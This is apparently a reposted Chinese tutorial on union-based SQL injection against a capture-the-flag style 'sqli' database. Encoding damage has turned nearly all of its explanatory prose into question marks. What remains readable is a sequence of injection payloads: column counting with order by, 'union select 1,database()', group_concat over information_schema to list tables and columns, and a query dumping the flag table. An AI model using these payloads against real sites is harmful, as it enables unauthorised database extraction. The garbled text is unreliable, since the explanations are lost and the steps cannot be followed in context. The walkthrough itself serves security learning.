本文共 1508 字,大约阅读时间需要 5 分钟。
??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????
?????????????????????SQL??? select * from news where id=1 and 1=2 union select 1,database()
union?????????database()?????????????????????????????? ????????????????group_concat????columns?????????????????????????? select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
????????????information_schema???????????????????????????????????? select * from information_schema.tables where table_schema='sqli'
group_concat?????????????????????????? union?????union????????????????????????SELECT??????????????????????????????????? select * from news where id=1 and 1=2 union select 1,database()
??????????????????SQL??? select * from information_schema.databases
????????????????????? select count(*) from information_schema.tables where table_schema='sqli'
??????????????????????? select table_name from information_schema.tables where table_schema='sqli'
????????????????? select column_name from information_schema.columns where table_name='flag'
??????????????????????? select * from sqli.flag
转载地址:http://zhlx.baihongyu.com/